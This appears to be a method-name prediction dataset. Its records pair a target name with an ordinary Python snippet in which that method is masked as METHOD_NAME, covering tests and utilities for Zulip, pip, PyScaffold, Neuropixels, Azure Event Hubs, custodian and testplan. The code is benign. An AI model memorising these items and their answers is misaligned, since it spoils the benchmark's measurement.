storage_writer = sqlite_writer.SQLiteStorageFileWriter()
storage_writer.Open(path=test_path)
storage_writer.Close()
storage_writer.Open(path=test_path)
storage_writer.Close()
storage_writer = sqlite_writer.SQLiteStorageFileWriter(
storage_type=definitions.STORAGE_TYPE_TASK)
storage_writer.Open(path=test_path)
storage_writer.Close()
storage_writer.Open(path=test_path)
with self.assertRaises(IOError):
storage_writer.Open(path=test_path)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.Close()
if __name__ == '__main__':
unittest.main() | null |
test no message alert | from zerver.lib.test_classes import WebhookTestCase
class GrafanaHookTests(WebhookTestCase):
STREAM_NAME = "grafana"
URL_TEMPLATE = "/api/v1/external/grafana?&api_key={api_key}&stream={stream}"
WEBHOOK_DIR_NAME = "grafana"
# Note: Include a test function per each distinct message condition your integration supports
def test_alert(self) -> None:
expected_topic = "[Alerting] Test notification"
expected_message = """
:alert: **ALERTING**
[Test rule](http://localhost:3000/)
Someone is testing the alert notification within grafana.
**High value:** 100
**Higher Value:** 200
[Click to view visualization](https://grafana.com/assets/img/blog/mixed_styles.png)
""".strip()
# use fixture named alert
self.check_webhook(
"alert",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_no_data_alert(self) -> None:
expected_topic = "[Alerting] No Data alert"
expected_message = """
:alert: **ALERTING**
[No Data alert](http://localhost:3000/d/GG2qhR3Wz/alerttest?fullscreen&edit&tab=alert&panelId=6&orgId=1)
The panel has no data.
""".strip()
# use fixture named no_data_alert
self.check_webhook(
"no_data_alert",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def METHOD_NAME(self) -> None:
expected_topic = "[Alerting] No Message alert"
expected_message = """
:alert: **ALERTING**
[No Message alert](http://localhost:3000/d/GG2qhR3Wz/alerttest?fullscreen&edit&tab=alert&panelId=8&orgId=1)
**A-series:** 21.573108436586445
""".strip()
# use fixture named no_message_alert
self.check_webhook(
"no_message_alert",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
# Note: Include a test function per each distinct message condition your integration supports
def test_alert_ok(self) -> None:
expected_topic = "[Ok] Test notification"
expected_message = """
:squared_ok: **OK**
[Test rule](http://localhost:3000/)
Someone is testing the alert notification within grafana.
**High value:** 0
[Click to view visualization](https://grafana.com/assets/img/blog/mixed_styles.png)
""".strip()
# use fixture named alert_ok
self.check_webhook(
"alert_ok",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
# Note: Include a test function per each distinct message condition your integration supports
def test_alert_paused(self) -> None:
expected_topic = "[Paused] Test notification"
expected_message = """
:info: **PAUSED**
[Test rule](http://localhost:3000/)
Someone is testing the alert notification within grafana.
[Click to view visualization](https://grafana.com/assets/img/blog/mixed_styles.png)
""".strip()
# use fixture named alert_paused
self.check_webhook(
"alert_paused",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
# Note: Include a test function per each distinct message condition your integration supports
def test_alert_pending(self) -> None:
expected_topic = "[Pending] Test notification"
expected_message = """
:info: **PENDING**
[Test rule](http://localhost:3000/)
Someone is testing the alert notification within grafana.
**High value:** 100
**Higher Value:** 200
[Click to view visualization](https://grafana.com/assets/img/blog/mixed_styles.png)
""".strip()
# use fixture named alert_pending
self.check_webhook(
"alert_pending",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_alert_new(self) -> None:
expected_topic = "[RESOLVED:1]"
expected_message = """
:checkbox: **RESOLVED**
Webhook test message.
---
**Alert 1**: TestAlert.
This alert was fired at <time:2022-08-31T05:54:04.52289368Z>.
This alert was resolved at <time:2022-08-31T10:30:00.52288431Z>.
Labels:
- alertname: TestAlert
- instance: Grafana
Annotations:
- summary: Notification test
1 alert(s) truncated.
""".strip()
self.check_webhook(
"alert_new",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_alert_new_multiple(self) -> None:
expected_topic = "[FIRING:2]"
expected_message = """
:alert: **FIRING**
Webhook test message.
---
**Alert 1**: High memory usage.
This alert was fired at <time:2021-10-12T09:51:03.157076+02:00>.
Labels:
- alertname: High memory usage
- team: blue
- zone: us-1
Annotations:
- description: The system has high memory usage
- runbook_url: https://myrunbook.com/runbook/1234
- summary: This alert was triggered for zone us-1
---
**Alert 2**: High CPU usage.
This alert was fired at <time:2021-10-12T09:56:03.157076+02:00>.
Labels:
- alertname: High CPU usage
- team: blue
- zone: eu-1
Annotations:
- description: The system has high CPU usage
- runbook_url: https://myrunbook.com/runbook/1234
- summary: This alert was triggered for zone eu-1
""".strip()
self.check_webhook(
"alert_new_multiple",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
) | null |
mkurl pypi url | import itertools
import logging
import os
import posixpath
import urllib.parse
from typing import List
from pip._vendor.packaging.utils import canonicalize_name
from pip._internal.models.index import PyPI
from pip._internal.utils.compat import has_tls
from pip._internal.utils.misc import normalize_path, redact_auth_from_url
logger = logging.getLogger(__name__)
class SearchScope:
"""
Encapsulates the locations that pip is configured to search.
"""
__slots__ = ["find_links", "index_urls", "no_index"]
@classmethod
def create(
cls,
find_links: List[str],
index_urls: List[str],
no_index: bool,
) -> "SearchScope":
"""
Create a SearchScope object after normalizing the `find_links`.
"""
# Build find_links. If an argument starts with ~, it may be
# a local file relative to a home directory. So try normalizing
# it and if it exists, use the normalized version.
# This is deliberately conservative - it might be fine just to
# blindly normalize anything starting with a ~...
built_find_links: List[str] = []
for link in find_links:
if link.startswith("~"):
new_link = normalize_path(link)
if os.path.exists(new_link):
link = new_link
built_find_links.append(link)
# If we don't have TLS enabled, then WARN if anyplace we're looking
# relies on TLS.
if not has_tls():
for link in itertools.chain(index_urls, built_find_links):
parsed = urllib.parse.urlparse(link)
if parsed.scheme == "https":
logger.warning(
"pip is configured with locations that require "
"TLS/SSL, however the ssl module in Python is not "
"available."
)
break
return cls(
find_links=built_find_links,
index_urls=index_urls,
no_index=no_index,
)
def __init__(
self,
find_links: List[str],
index_urls: List[str],
no_index: bool,
) -> None:
self.find_links = find_links
self.index_urls = index_urls
self.no_index = no_index
def get_formatted_locations(self) -> str:
lines = []
redacted_index_urls = []
if self.index_urls and self.index_urls != [PyPI.simple_url]:
for url in self.index_urls:
redacted_index_url = redact_auth_from_url(url)
# Parse the URL
purl = urllib.parse.urlsplit(redacted_index_url)
# URL is generally invalid if scheme and netloc are missing;
# there are issues with Python and URL parsing, so this test
# is a bit crude. See bpo-20271, bpo-23505. Python doesn't
# always parse invalid URLs correctly - it should raise
# exceptions for malformed URLs
if not purl.scheme and not purl.netloc:
logger.warning(
'The index url "%s" seems invalid, please provide a scheme.',
redacted_index_url,
)
redacted_index_urls.append(redacted_index_url)
lines.append(
"Looking in indexes: {}".format(", ".join(redacted_index_urls))
)
if self.find_links:
lines.append(
"Looking in links: {}".format(
", ".join(redact_auth_from_url(url) for url in self.find_links)
)
)
return "\n".join(lines)
def get_index_urls_locations(self, project_name: str) -> List[str]:
"""Returns the locations found via self.index_urls
Checks the url_name on the main (first in the list) index and
uses this url_name to produce all locations
"""
def METHOD_NAME(url: str) -> str:
loc = posixpath.join(
url, urllib.parse.quote(canonicalize_name(project_name))
)
# For maximum compatibility with easy_install, ensure the path
# ends in a trailing slash. Although this isn't in the spec
# (and PyPI can handle it without the slash) some other index
# implementations might break if they relied on easy_install's
# behavior.
if not loc.endswith("/"):
loc = loc + "/"
return loc
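# For illustration (hypothetical project and index): a project named "My.Project"
# against "https://pypi.org/simple" canonicalizes to "https://pypi.org/simple/my-project/".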
return [METHOD_NAME(url) for url in self.index_urls] | null |
test pretend main | import logging
import os
import sys
from unittest.mock import Mock
import pytest
from pyscaffold import cli
from pyscaffold.exceptions import ErrorLoadingExtension
from pyscaffold.file_system import localize_path as lp
from .log_helpers import find_report
if sys.version_info[:2] >= (3, 8):
# TODO: Import directly (no need for conditional) when `python_requires = >= 3.8`
from importlib.metadata import EntryPoint # pragma: no cover
else:
from importlib_metadata import EntryPoint # pragma: no cover
def test_parse_args():
args = ["my-project"]
opts = cli.parse_args(args)
assert opts["project_path"] == "my-project"
def test_parse_verbose_option():
for quiet in ("--verbose", "-v"):
args = ["my-project", quiet]
opts = cli.parse_args(args)
assert opts["log_level"] == logging.INFO
def test_parse_default_log_level():
args = ["my-project"]
opts = cli.parse_args(args)
assert opts["log_level"] == logging.WARNING
def test_parse_pretend():
for flag in ["--pretend", "-P"]:
opts = cli.parse_args(["my-project", flag])
assert opts["pretend"]
opts = cli.parse_args(["my-project"])
assert not opts["pretend"]
def test_parse_list_actions():
opts = cli.parse_args(["my-project", "--list-actions"])
assert opts["command"] == cli.list_actions
opts = cli.parse_args(["my-project"])
assert opts["command"] == cli.run_scaffold
def test_parse_license_finds_best_fit():
examples = {
"apache": "Apache-2.0",
"artistic": "Artistic-2.0",
"affero": "AGPL-3.0-only",
"eclipse": "EPL-1.0",
"new-bsd": "BSD-3-Clause",
"mozilla": "MPL-2.0",
"gpl3": "GPL-3.0-only",
}
for key, value in examples.items():
opts = cli.parse_args(["my-project", "--license", key])
assert opts["license"] == value
# option not passed
assert "license" not in cli.parse_args(["my_project"])
def test_verbose_main(tmpfolder, git_mock, caplog):
args = ["my-project", "--verbose"]
cli.main(args)
assert os.path.exists(args[0])
# Check for some log messages
assert find_report(caplog, "invoke", "get_default_options")
assert find_report(caplog, "invoke", "verify_options_consistency")
assert find_report(caplog, "invoke", "define_structure")
assert find_report(caplog, "invoke", "create_structure")
assert find_report(caplog, "create", "setup.py")
assert find_report(caplog, "create", lp("my_project/__init__.py"))
assert find_report(caplog, "run", "git init")
assert find_report(caplog, "run", "git add")
def METHOD_NAME(tmpfolder, git_mock, caplog):
for flag in ["--pretend", "-P"]:
args = ["my-project", flag]
cli.main(args)
assert not os.path.exists(args[0])
# Check for some log messages
assert find_report(caplog, "invoke", "get_default_options")
assert find_report(caplog, "invoke", "verify_options_consistency")
assert find_report(caplog, "invoke", "define_structure")
assert find_report(caplog, "invoke", "create_structure")
assert find_report(caplog, "create", "setup.py")
assert find_report(caplog, "create", lp("my_project/__init__.py"))
assert find_report(caplog, "run", "git init")
assert find_report(caplog, "run", "git add")
def test_main_when_updating(tmpfolder, capsys, git_mock):
args = ["my-project"]
cli.main(args)
args = ["--update", "my-project"]
cli.main(args)
assert os.path.exists(args[1])
out, _ = capsys.readouterr()
assert "Update accomplished!" in out
def test_main_with_list_actions(tmpfolder, capsys, isolated_logger):
# When putup is called with --list-actions,
args = ["my-project", "--no-tox", "--list-actions"]
cli.main(args)
# then the action list should be printed,
out, _ = capsys.readouterr()
assert "Planned Actions" in out
assert "pyscaffold.actions:get_default_options" in out
assert "pyscaffold.structure:define_structure" in out
assert "pyscaffold.extensions.no_tox:remove_files" in out
assert "pyscaffold.structure:create_structure" in out
assert "pyscaffold.actions:init_git" in out
# but no project should be created
assert not os.path.exists(args[0])
def test_wrong_extension(monkeypatch, tmpfolder):
# Given an entry point with some problems is registered in the pyscaffold.cli group
# (e.g. failing implementation, wrong dependencies that cause the python file to
# fail to evaluate)
fake = EntryPoint("fake", "pyscaffoldext.SOOO__fake__:Fake", "pyscaffold.cli")
entry_points_mock = Mock(return_value={"pyscaffold.cli": [fake]})
monkeypatch.setattr("pyscaffold.extensions.entry_points", entry_points_mock)
with pytest.raises(ErrorLoadingExtension, match=r".*error loading.*fake.*"):
# When putup is called with the corresponding flag
args = ["my-project"]
cli.main(args)
entry_points_mock.assert_called()
# Then the CLI should display a meaningful error message
def test_run(tmpfolder, git_mock):
sys.argv = ["pyscaffold", "my-project"]
cli.run()
assert os.path.exists(sys.argv[1])
def test_get_log_level():
assert cli.get_log_level([]) == logging.WARNING
assert cli.get_log_level(["--pretend"]) == logging.INFO
assert cli.get_log_level(["--verbose"]) == logging.INFO
assert cli.get_log_level(["--very-verbose"]) == logging.DEBUG
# Make sure it also works with sys.argv
sys.argv = ["putup", "--very-verbose"]
assert cli.get_log_level() == logging.DEBUG | null |
synchronize neuropixel streams | import numpy as np
def get_neuropixels_sample_shifts(num_channels=384, num_channels_per_adc=12, num_cycles=None):
"""
Calculates the relative sampling phase of each channel that results
from Neuropixels ADC multiplexing.
This information is needed to perform the preprocessing.phase_shift operation.
See https://github.com/int-brain-lab/ibllib/blob/master/ibllib/ephys/neuropixel.py
for the original implementation.
Parameters
----------
num_channels : int, default: 384
The total number of channels in a recording.
All currently available Neuropixels variants have 384 channels.
num_channels_per_adc : int, default: 12
The number of channels per ADC on the probe.
Neuropixels 1.0 probes have 12 channels per ADC.
Neuropixels 2.0 probes have 16 channels per ADC.
num_cycles: int or None, default: None
The number of cycles in the ADC on the probe.
Neuropixels 1.0 probes have 13 cycles for AP and 12 for LFP.
Neuropixels 2.0 probes have 16 cycles.
If None, the num_channels_per_adc is used.
Returns
-------
sample_shifts : ndarray
The relative phase (from 0-1) of each channel
"""
if num_cycles is None:
num_cycles = num_channels_per_adc
adc_indices = np.floor(np.arange(num_channels) / (num_channels_per_adc * 2)) * 2 + np.mod(
np.arange(num_channels), 2
)
sample_shifts = np.zeros_like(adc_indices)
for a in adc_indices:
sample_shifts[adc_indices == a] = np.arange(num_channels_per_adc) / num_cycles
return sample_shifts
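# Example with assumed Neuropixels 1.0 AP values (384 channels, 12 channels per ADC,
# 13 cycles): channels sharing an ADC are spaced by 1/13 of a sample period and
# even/odd channels sit on separate ADCs, so the shifts come out in pairs:
#   shifts = get_neuropixels_sample_shifts(384, num_channels_per_adc=12, num_cycles=13)
#   shifts[:4] -> array([0., 0., 0.0769..., 0.0769...])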
def get_neuropixels_channel_groups(num_channels=384, num_channels_per_adc=12):
"""
Returns groups of simultaneously sampled channels on a Neuropixels probe.
The Neuropixels ADC sampling pattern is as follows:
Channels: ADCs:
||| |||
... ...
26 27 2 3
24 25 2 3
22 23 0 1
... ...
2 3 0 1
0 1 0 1 <-- even and odd channels are digitized by separate ADCs
||| |||
V V
This information is needed to perform the preprocessing.common_reference operation
on channels that are sampled synchronously.
Parameters
----------
num_channels : int, default: 384
The total number of channels in a recording.
All currently available Neuropixels variants have 384 channels.
num_channels_per_adc : int, default: 12
The number of channels per ADC on the probe.
Neuropixels 1.0 probes have 12 channels per ADC.
Neuropixels 2.0 probes have 16 channels per ADC.
Returns
-------
groups : list
A list of lists of simultaneously sampled channel indices
"""
groups = []
for i in range(num_channels_per_adc):
groups.append(
list(
np.sort(
np.concatenate(
[
np.arange(i * 2, num_channels, num_channels_per_adc * 2),
np.arange(i * 2 + 1, num_channels, num_channels_per_adc * 2),
]
)
)
)
)
return groups
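# Example with assumed Neuropixels 1.0 AP values (384 channels, 12 channels per ADC):
# 12 groups of 32 simultaneously sampled channels are returned, the first one starting
# with channels 0, 1, 24, 25, ...
#   groups = get_neuropixels_channel_groups(384, num_channels_per_adc=12)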
def METHOD_NAME(recording_ref, recording_other):
"""
Use the last "sync" channel from spikeglx or openephys neuropixels to synchronize
recordings.
Method used:
1. detect pulse times on both streams.
2. make a linear regression from 'other' to 'ref'.
The slope is close to 1 and corresponds to the sample rate correction.
The intercept is close to 0 and corresponds to the offset between the stream start times.
"""
# This will be done very very soon, I promise.
raise NotImplementedError
synchro_chan_id = recording_ref.channel_ids[-1]
trig_ref = recording_ref.get_traces(channel_ids=[synchro_chan_id], return_scaled=False)
trig_ref = trig_ref[:, 0]
times_ref = recording_ref.get_times()
synchro_chan_id = recording_other.channel_ids[-1]
trig_other = recording_other.get_traces(channel_ids=[synchro_chan_id], return_scaled=False)
trig_other = trig_other[:, 0]
times_other = recording_other.get_times()
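# A minimal sketch of the two steps described in the docstring, assuming the sync pulses
# are clean enough to detect with a mid-range threshold and both streams see the same pulses:
thr_ref = 0.5 * (float(trig_ref.min()) + float(trig_ref.max()))
thr_other = 0.5 * (float(trig_other.min()) + float(trig_other.max()))
pulse_times_ref = times_ref[np.flatnonzero(np.diff((trig_ref > thr_ref).astype(int)) == 1) + 1]
pulse_times_other = times_other[np.flatnonzero(np.diff((trig_other > thr_other).astype(int)) == 1) + 1]
# regression from 'other' to 'ref': slope ~ sample-rate correction, intercept ~ start-time offset
slope, intercept = np.polyfit(pulse_times_other, pulse_times_ref, 1)
corrected_times_other = slope * times_other + intercept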
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# ax.plot(times_ref, trig_ref)
# ax.plot(times_other, trig_other)
# plt.show() | null |
monitor | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import asyncio
import os
import dotenv
import logging
from logging.handlers import RotatingFileHandler
import time
from azure.eventhub.aio import EventHubConsumerClient
from azure.eventhub import parse_connection_string
logger = logging.getLogger('ASYNC_RECEIVE_PERF_TEST')
logger.setLevel(logging.INFO)
logger.addHandler(RotatingFileHandler("async_receive_perf_test.log"))
dotenv.load_dotenv()
CONN_STRS = [
os.environ["EVENT_HUB_CONN_STR_BASIC_NORTHEU"],
os.environ["EVENT_HUB_CONN_STR_STANDARD_NORTHEU"],
os.environ["EVENT_HUB_CONN_STR_BASIC_WESTUS2"],
os.environ["EVENT_HUB_CONN_STR_STANDARD_WESTUS2"]
]
EH_NAME_EVENT_SIZE_PAIR = [
('pyamqp_512', 512),
]
PREFETCH_LIST = [300, 3000]
PARTITION_ID = "0"
RUN_DURATION = 30
FIXED_AMOUNT = 100_000
async def receive_fixed_time_interval(
conn_str,
eventhub_name,
single_event_size,
prefetch=300,
batch_receiving=False,
description=None,
run_duration=30,
partition_id="0"
):
consumer_client = EventHubConsumerClient.from_connection_string(
conn_str,
consumer_group="$Default",
eventhub_name=eventhub_name
)
last_received_count = [0]
received_count = [0]
run_flag = [True]
all_perf_records = []
check_interval = 1
async def on_event(partition_context, event):
received_count[0] += 1
async def on_event_batch(partition_context, events):
received_count[0] += len(events)
async def METHOD_NAME():
while run_flag[0]:
snap = received_count[0]
perf = (snap - last_received_count[0]) / check_interval
last_received_count[0] = snap
all_perf_records.append(perf)
await asyncio.sleep(check_interval)
target = consumer_client.receive_batch if batch_receiving else consumer_client.receive
kwargs = {
"partition_id": partition_id,
"starting_position": "-1", # "-1" is from the beginning of the partition.
"prefetch": prefetch
}
if batch_receiving:
kwargs["max_batch_size"] = prefetch
kwargs["on_event_batch"] = on_event_batch
else:
kwargs["on_event"] = on_event
recv_future = asyncio.create_task(target(**kwargs))
monitor_future = asyncio.create_task(METHOD_NAME())
await asyncio.sleep(run_duration)
await consumer_client.close()
run_flag[0] = False
await recv_future
await monitor_future
valid_perf_records = all_perf_records[10:] # skip the first 10 records to let the receiving program be stable
avg_perf = sum(valid_perf_records) / len(valid_perf_records)
logger.info(
"EH Namespace: {}.\nMethod: {}, The average performance is {} events/s, throughput: {} bytes/s.\n"
"Configs are: Single message size: {} bytes, Run duration: {} seconds, Batch: {}.\n"
"Prefetch: {}".format(
parse_connection_string(conn_str).fully_qualified_namespace,
description or "receive_fixed_time_interval",
avg_perf,
avg_perf * single_event_size,
single_event_size,
run_duration,
batch_receiving,
prefetch
)
)
async def receive_fixed_amount(
conn_str,
eventhub_name,
single_event_size,
prefetch=300,
batch_receiving=False,
description=None,
partition_id="0",
run_times=1,
fixed_amount=100_000
):
consumer_client = EventHubConsumerClient.from_connection_string(
conn_str,
consumer_group="$Default",
eventhub_name=eventhub_name,
)
perf_records = []
received_count = [0]
async def on_event(partition_context, event):
received_count[0] += 1
if received_count[0] == fixed_amount:
await consumer_client.close()
async def on_event_batch(partition_context, events):
received_count[0] += len(events)
if received_count[0] >= fixed_amount:
await consumer_client.close()
for i in range(run_times):
start_time = time.time()
async with consumer_client:
if batch_receiving:
await consumer_client.receive_batch(
on_event_batch=on_event_batch,
partition_id=partition_id,
starting_position="-1",
max_batch_size=prefetch,
prefetch=prefetch
)
else:
await consumer_client.receive(
on_event=on_event,
partition_id=partition_id,
starting_position="-1",
prefetch=prefetch
)
end_time = time.time()
total_time = end_time - start_time
speed = fixed_amount/total_time
perf_records.append(speed)
received_count[0] = 0
avg_perf = sum(perf_records) / len(perf_records)
logger.info(
"EH Namespace: {}.\nMethod: {}, The average performance is {} events/s, throughput: {} bytes/s.\n"
"Configs are: Single message size: {} bytes, Total events to receive: {}, Batch: {}.\n"
"Prefetch: {}".format(
parse_connection_string(conn_str).fully_qualified_namespace,
description or "receive_fixed_amount",
avg_perf,
avg_perf * single_event_size,
single_event_size,
fixed_amount,
batch_receiving,
prefetch
)
)
if __name__ == "__main__":
for conn_str in CONN_STRS:
for eh_name, single_event_size in EH_NAME_EVENT_SIZE_PAIR:
for prefetch in PREFETCH_LIST:
for batch_receiving in [True, False]:
print('------------------- receiving fixed amount -------------------')
asyncio.run(
receive_fixed_amount(
conn_str=conn_str,
eventhub_name=eh_name,
single_event_size=single_event_size,
prefetch=prefetch,
batch_receiving=batch_receiving,
fixed_amount=FIXED_AMOUNT
)
)
print('------------------- receiving fixed interval -------------------')
asyncio.run(
receive_fixed_time_interval(
conn_str=conn_str,
eventhub_name=eh_name,
single_event_size=single_event_size,
prefetch=prefetch,
batch_receiving=batch_receiving,
run_duration=RUN_DURATION
)
) | null |
test abort handler | # Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import glob
import os
import shutil
import time
import unittest
import warnings
from pathlib import Path
from pymatgen.io.cp2k.inputs import Keyword, KeywordList
from pymatgen.io.cp2k.sets import StaticSet
from custodian.cp2k.handlers import (
AbortHandler,
FrozenJobErrorHandler,
NumericalPrecisionHandler,
StdErrHandler,
UnconvergedScfErrorHandler,
get_conv,
)
from custodian.cp2k.interpreter import Cp2kModder
def clean_dir(d):
for file in glob.glob(os.path.join(d, "error.*.tar.gz")):
os.remove(file)
for file in glob.glob(os.path.join(d, "custodian.chk.*.tar.gz")):
os.remove(file)
class HandlerTests(unittest.TestCase):
def setUp(self):
warnings.filterwarnings("ignore")
self.TEST_FILES_DIR = os.path.join(Path(__file__).parent.absolute(), "../../../test_files/cp2k")
clean_dir(self.TEST_FILES_DIR)
time.sleep(1) # for frozenhandler
shutil.copy(os.path.join(self.TEST_FILES_DIR, "cp2k.inp.orig"), os.path.join(self.TEST_FILES_DIR, "cp2k.inp"))
self.input_file = os.path.join(self.TEST_FILES_DIR, "cp2k.inp")
self.output_file_preconditioner = os.path.join(self.TEST_FILES_DIR, "cp2k.out.precondstuck")
self.output_file_cholesky = os.path.join(self.TEST_FILES_DIR, "cp2k.out.cholesky")
self.output_file_imprecise = os.path.join(self.TEST_FILES_DIR, "cp2k.out.imprecise")
self.output_file_unconverged = os.path.join(self.TEST_FILES_DIR, "cp2k.out.unconverged")
self.output_file_stderr = os.path.join(self.TEST_FILES_DIR, "std_err.txt")
self.output_file_hybrid = os.path.join(self.TEST_FILES_DIR, "cp2k.out.hybrid")
self.output_file_conv = os.path.join(self.TEST_FILES_DIR, "cp2k.out.conv")
self.modder = Cp2kModder(filename=self.input_file)
def test(self):
"""Ensure modder works"""
kwds = KeywordList(keywords=[Keyword("BASIS_SET_FILE_NAME", "FILE1"), Keyword("BASIS_SET_FILE_NAME", "FILE2")])
actions = [
{"dict": self.input_file, "action": {"_set": {"FORCE_EVAL": {"METHOD": "NOT QA"}}}},
{"dict": self.input_file, "action": {"_set": {"FORCE_EVAL": {"DFT": {"BASIS_SET_FILE_NAME": kwds}}}}},
{
"dict": self.input_file,
"action": {"_set": {"FORCE_EVAL": {"DFT": {"SCF": {"MAX_SCF": 50}, "OUTER_SCF": {"MAX_SCF": 8}}}}},
},
]
self.modder.apply_actions(actions=actions)
assert self.modder.ci["FORCE_EVAL"]["METHOD"] == Keyword("METHOD", "NOT QA")
assert isinstance(self.modder.ci["FORCE_EVAL"]["DFT"]["BASIS_SET_FILE_NAME"], KeywordList)
def test_handler_inits(self):
"""Ensure handlers initialize fine without real input/output files"""
for handler in [AbortHandler, FrozenJobErrorHandler, NumericalPrecisionHandler, UnconvergedScfErrorHandler]:
handler()
def test_frozenjobhandler(self):
"""Handler for frozen job"""
h = FrozenJobErrorHandler(input_file=self.input_file, output_file=self.output_file_preconditioner, timeout=1)
assert h.check()
ci = StaticSet.from_file(self.input_file)
assert ci["FORCE_EVAL"]["DFT"]["SCF"]["OT"]["PRECONDITIONER"] == Keyword(
"PRECONDITIONER", "FULL_SINGLE_INVERSE"
)
h.correct()
ci = StaticSet.from_file(self.input_file)
assert ci["FORCE_EVAL"]["DFT"]["SCF"]["OT"]["PRECONDITIONER"] == Keyword("PRECONDITIONER", "FULL_ALL")
h = FrozenJobErrorHandler(input_file=self.input_file, output_file=self.output_file_preconditioner, timeout=1)
assert h.check()
h.correct()
ci = StaticSet.from_file(self.input_file)
assert ci["FORCE_EVAL"]["DFT"]["SCF"]["OT"]["PRECOND_SOLVER"] == Keyword("PRECOND_SOLVER", "DIRECT")
h = FrozenJobErrorHandler(input_file=self.input_file, output_file=self.output_file_imprecise, timeout=1)
h.check()
def test_unconverged_handler(self):
"""Handler for SCF handling not working"""
ci = StaticSet.from_file(self.input_file)
h = UnconvergedScfErrorHandler(input_file=self.input_file, output_file=self.output_file_unconverged)
h.check()
assert h.is_ot
assert ci["force_eval"]["dft"]["scf"]["ot"]["minimizer"] == Keyword("MINIMIZER", "DIIS")
actions = h.correct()
assert actions["errors"], ["Non-converging Job"]
ci = StaticSet.from_file(self.input_file)
assert ci["force_eval"]["dft"]["scf"]["ot"]["minimizer"] == Keyword("MINIMIZER", "CG")
# Fake diag check. Turns on mixing
h.is_ot = False
actions = h.correct()
assert actions["errors"], ["Non-converging Job"]
ci = StaticSet.from_file(self.input_file)
assert ci["force_eval"]["dft"]["scf"]["MIXING"]["ALPHA"] == Keyword("ALPHA", 0.1)
def METHOD_NAME(self):
"""Checks if cp2k called abort"""
h = AbortHandler(input_file=self.input_file, output_file=self.output_file_cholesky)
assert h.check()
def test_imprecision_handler(self):
"""Check for low precision leading to stagnant SCF"""
h = NumericalPrecisionHandler(self.input_file, output_file=self.output_file_imprecise, max_same=3)
assert h.check()
c = h.correct()
assert c["errors"], ["Insufficient precision"]
def test_std_out(self):
"""Errors sent to the std out instead of cp2k out"""
h = StdErrHandler(std_err=self.output_file_stderr)
assert h.check()
h.correct()
def test_conv(self):
"""Check that SCF convergence can be read"""
assert len(get_conv(self.output_file_conv)) == 45 | null |
request and response | """Tests HTTP requests between a server and a client."""
import json
from testplan.common.utils.context import context
from testplan.testing.multitest import MultiTest, testsuite, testcase
from testplan.testing.multitest.driver.http import (
HTTPServer,
HTTPClient,
HTTPResponse,
)
@testsuite
class HTTPTestsuite:
"""HTTP requests between a server and a client."""
@testcase
def METHOD_NAME(self, env, result):
"""
Client makes a request, the server receives it and responds back.
"""
# The HTTPClient sends a GET request to some section of the API. The
# HTTPServer will respond with the next message in its response queue
# no matter the HTTP method (GET, POST etc.) or the section of the API
# it has been sent.
result.log("Client sends GET request")
env.http_client.get(api="/random/text")
# Need to do a receive otherwise it will ruin our next testcase
received_request = env.http_server.receive()
result.log(f"Server got GET request: {received_request}")
# Create some JSON.
json_content = {"this": ["is", "a", "json", "object"]}
# We then prepare an HTTPResponse. Headers are added as a dictionary and
# content as a list. For this example we just indicate that the content
# type is JSON and dump the JSON as a string so it can be sent.
prepared_response = HTTPResponse(
headers={"Content-type": "application/json"},
content=[json.dumps(json_content)],
)
# The HTTPServer then responds. Under the hood this adds the response to
# the HTTPServer's response queue which will be immediately sent as the
# HTTPClient has already sent a request.
result.log("Server receives request and sends response")
env.http_server.respond(prepared_response)
# The HTTPClient then receives the HTTPServer's response.
response = env.http_client.receive()
# We are verifying the JSON sent back is the same as the one sent by the
# HTTPServer.
result.dict.match(
response.json(), json_content, "JSON response from server"
)
@testcase
def post_and_response(self, env, result):
"""
Client makes a request, the server receives it and responds back.
"""
# Create some JSON.
json_content = {"this": ["is", "another", "json", "object"]}
# The HTTPClient sends a POST request with some data to some section of the API. The
# HTTPServer will respond with the same message in its response queue
# no matter the HTTP method (GET, POST etc.) or the section of the API
# it has been sent.
result.log("Client sends POST request")
env.http_client.post(
api="/random/text",
json=json_content,
headers={"Content-Type": "application/json"},
)
# The HTTP Server receives the request
received_request = env.http_server.receive()
result.log(f"Server got POST request: {received_request}")
# We are verifying the JSON sent back is the same as the one sent by the
# HTTPServer.
result.dict.match(
received_request.json, json_content, "JSON sent to the server"
)
# We then prepare an HTTPResponse. Headers are added as a dictionary and
# content as a list. For this example we just indicate that the content
# type is JSON and dump the JSON as a string so it can be sent.
prepared_response = HTTPResponse(
headers={"Content-type": "application/json"},
content=[json.dumps(json_content)],
)
# The HTTPServer then responds. Under the hood this adds the response to
# the HTTPServer's response queue which will be immediately sent as the
# HTTPClient has already sent a request.
result.log("Server receives request and sends response")
env.http_server.respond(prepared_response)
# The HTTPClient then receives the HTTPServer's response.
response = env.http_client.receive()
# We are verifying the JSON sent back is the same as the one sent by the
# HTTPServer.
result.dict.match(
response.json(), json_content, "JSON response from server"
)
def get_multitest(name):
"""
Creates and returns a new MultiTest instance to be added to the plan.
The environment is a server and a client connecting using the context
functionality that retrieves host/port of the server after it is started.
"""
test = MultiTest(
name=name,
suites=[HTTPTestsuite()],
environment=[
HTTPServer(name="http_server"),
HTTPClient(
name="http_client",
host=context("http_server", "{{host}}"),
port=context("http_server", "{{port}}"),
),
],
)
return test | null |
docker ksql cli session | import os
import uuid
import shlex
import tempfile
import subprocess
from functools import reduce
from itertools import dropwhile
from pprint import pprint
from util import in_base_dir
def get_file_name(f):
base = os.path.splitext(f)[0]
file_name = os.path.split(base)[-1]
return file_name
def make_spool_command(file_name):
return "spool '%s';" % file_name
def make_unspool_command():
return "spool off;"
def make_column_width_command(column_width):
if column_width > -1:
return "SET CLI COLUMN-WIDTH %s" % column_width
return ""
def build_input_sections (context, step):
result = []
column_width = step.get("column_width", -1)
